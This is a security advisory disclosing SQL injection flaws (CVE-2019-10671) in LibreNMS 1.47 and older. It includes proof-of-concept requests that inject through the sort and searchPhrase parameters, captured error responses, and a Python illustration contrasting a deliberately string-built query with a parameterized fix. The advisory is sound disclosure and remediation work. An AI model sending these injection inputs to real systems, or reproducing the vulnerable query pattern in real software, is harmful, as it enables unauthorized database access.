LibreNMS Multiple SQL Injection Vulnerability

15 July 2019

CVE

CVE-2019-10671

CVSS SCORE

8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

XID

XL-19-025

AFFECTED VENDORS

LibreNMS (www.librenms.org)

CREDIT

Eldar Marcussen - xen1thLabs - Software Labs

VULNERABILITY SUMMARY

LibreNMS does not parameterize all user-supplied input within database queries, resulting in SQL injection vulnerabilities. An authenticated attacker can subvert these database queries to extract or manipulate data.

TECHNICAL DETAILS

An authenticated attacker can manipulate the affected database queries, typically to extract data that can then be used to elevate privileges. The proof of concept below exercises two injection points: the sort parameter of graph.php, whose value is placed directly into an ORDER BY clause, and the searchPhrase parameter of ajax_table.php, whose value is concatenated into LIKE patterns. In both cases the response contains the failing SQL statement and the PHP files that built it.

PROOF OF CONCEPT

http://host/graph.php?device=1&type=port_mac_acc_total&from=1553493874&to=1553515200&width=500&height=300&id=1&port=80&sort=union+select&stat=nuks

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 26 Mar 2019 10:50:24 GMT
Content-Type: image/png
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 11987

SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'union select DESC LIMIT 0,10' at line 4 (SQL: SELECT *, (M.cipMacHCSwitchedBytes_input_rate + M.cipMacHCSwitchedBytes_output_rate) AS bps,
        (M.cipMacHCSwitchedPkts_input_rate + M.cipMacHCSwitchedPkts_output_rate) AS pps
        FROM `mac_accounting` AS M, `ports` AS I, `devices` AS D WHERE M.port_id = 1
        AND I.port_id = M.port_id AND D.device_id = I.device_id ORDER BY union select DESC LIMIT 0,10) (SQL: SELECT *, (M.cipMacHCSwitchedBytes_input_rate + M.cipMacHCSwitchedBytes_output_rate) AS bps,
        (M.cipMacHCSwitchedPkts_input_rate + M.cipMacHCSwitchedPkts_output_rate) AS pps
        FROM `mac_accounting` AS M, `ports` AS I, `devices` AS D WHERE M.port_id = 1
        AND I.port_id = M.port_id AND D.device_id = I.device_id ORDER BY union select DESC LIMIT 0,10)
  /opt/librenms/html/includes/graphs/port/mac_acc_total.inc.php:52
  /opt/librenms/html/includes/graphs/graph.inc.php:50
  /opt/librenms/html/graph.php:23
‰PNG

Figure 1 – SQL injection

POST /ajax_table.php HTTP/1.1
Host: 172.16.230.174
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.230.174/health/metric=toner/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Connection: close
Cookie: PHPSESSID=ierg32mbjb2i5n7ajcbtrr1j7f; XSRF-TOKEN=eyJpdiI6Ik9yY0F1bjZUS3VcLzZ2WitRXC81UEhDdz09IiwidmFsdWUiOiJ5Q1IrV1wvVXkzbW00dn RXRmJXc0daOXVGMENcL2llWk9vMXRXT2ZBMEtvajErVGhpTWdzXC81S3BUdys4bmoyQWxadVJRMVl LK1IzQjBaSEZZaFNKeFhaQT09IiwibWFjIjoiOGJhOGFiNzY1YWYzOGM4MDAyNzc5MmZjYzFmNzMzN2 VmYzg0OTlhNWIzNmM3ODk3ODMyOTQxN2RhYjQwM2RiNSJ9; librenms_session=eyJpdiI6InRzMVdmVjJWYm5wTmk1MTNGYllqT1E9PSIsInZhbHVlIjoibmd3ZGdyYit5S mJZdTBMR0ppajkzU1c3WmJ6anBoV3VNWW1LZWx4SFc5WktFM3pDRnVOcWErTDdwVkN5S1J6OFN6 VWV2QkZOcWZZVXVZR0Z2XC9lN3FRPT0iLCJtYWMiOiJkMjVjNzM3OGQ5ZjhmMzU0Y2U4NGEzOGRkM zc4YTBjZThmMTVjN2U2OWU2OGEyNGZhYTlhNDI3MTFjYjE1OThmIn0%3D

current=11&rowCount=50&searchPhrase=aaaa'&id=toner&view=detail&debug=1

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 26 Mar 2019 11:32:24 GMT
Content-Type: application/json
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 915

SQL[SELECT COUNT(`toner_id`) FROM `toner` [1] 0.21ms]
SQL Error! SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT' at line 1 (SQL: SELECT * FROM `toner` AS S, `devices` AS D WHERE S.device_id = D.device_id AND (`D`.`hostname` LIKE '%aaaa'%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT 50,5) (SQL: SELECT * FROM `toner` AS S, `devices` AS D WHERE S.device_id = D.device_id AND (`D`.`hostname` LIKE '%aaaa'%' OR `toner_descr` LIKE '%aaaa'%') ORDER BY `D`.`hostname`, `toner_descr` LIMIT 50,5)
  /opt/librenms/html/includes/table/toner.inc.php:54
  /opt/librenms/html/ajax_table.php:44
{
    "current": 11,
    "rowCount": 5,
    "rows": [],
    "total": 0
}
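The toner search from the second request above, rebuilt in Python against an in-memory SQLite stand-in as an added illustration; this is not LibreNMS code, and the tables and rows are constructed. It places the string-built query that fails on a quote beside a hardened version that binds the search phrase as a parameter, escapes LIKE wildcards, and maps the sort key through an allowlist, since an ORDER BY column cannot be a bound parameter (the same defect class as the sort parameter of graph.php).

```python
import sqlite3

# Constructed in-memory stand-in for the two tables named in the advisory's error
# output; the columns and rows are illustrative, not LibreNMS's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE devices (device_id INTEGER, hostname TEXT);
        CREATE TABLE toner (toner_id INTEGER, device_id INTEGER, toner_descr TEXT);
        INSERT INTO devices VALUES (1, 'printer-a'), (2, 'printer-b');
        INSERT INTO toner VALUES (10, 1, 'black'), (11, 2, 'aaaa'), (12, 2, 'cyan');
    """)
    return db

def toner_search_vulnerable(db, phrase, sort="hostname"):
    # Mirrors the failing statement in the advisory: phrase and sort column are
    # concatenated straight into the SQL text, so a quote breaks the statement.
    sql = ("SELECT toner_id FROM toner AS S, devices AS D WHERE S.device_id = D.device_id "
           f"AND (D.hostname LIKE '%{phrase}%' OR toner_descr LIKE '%{phrase}%') "
           f"ORDER BY {sort}, toner_id")
    return [row[0] for row in db.execute(sql)]

# Allowlist mapping the user-facing sort key to a fixed column expression. ORDER BY
# cannot take a bound parameter, so this is how the column stays user-selectable.
SORT_COLUMNS = {"hostname": "D.hostname", "toner_descr": "toner_descr"}

def escape_like(text):
    # Escape the LIKE metacharacters so user text is matched literally; the SQL
    # below declares backslash as the escape character.
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def toner_search_safe(db, phrase, sort="hostname"):
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError(f"sort key not allowed: {sort!r}")
    pattern = f"%{escape_like(phrase)}%"
    # The phrase travels as a bound parameter, so a quote in it can no longer
    # terminate the string literal (the failure mode shown in the advisory).
    sql = ("SELECT toner_id FROM toner AS S, devices AS D WHERE S.device_id = D.device_id "
           "AND (D.hostname LIKE ? ESCAPE '\\' OR toner_descr LIKE ? ESCAPE '\\') "
           f"ORDER BY {column}, toner_id")
    return [row[0] for row in db.execute(sql, (pattern, pattern))]

if __name__ == "__main__":
    db = make_db()
    print(toner_search_safe(db, "aaaa'"))  # [] : the quote is an ordinary character now
    try:
        toner_search_vulnerable(db, "aaaa'")
    except sqlite3.OperationalError as e:
        print("string-built query failed:", e)
```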

AFFECTED SYSTEMS

LibreNMS 1.47 and older

SOLUTION

Upgrade to the latest version of LibreNMS.

DISCLOSURE TIMELINE

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination
28/03/2019 - Provided vulnerability details
16/04/2019 - Version 1.50.1 released which resolves this issue
15/07/2019 - xen1thLabs public disclosure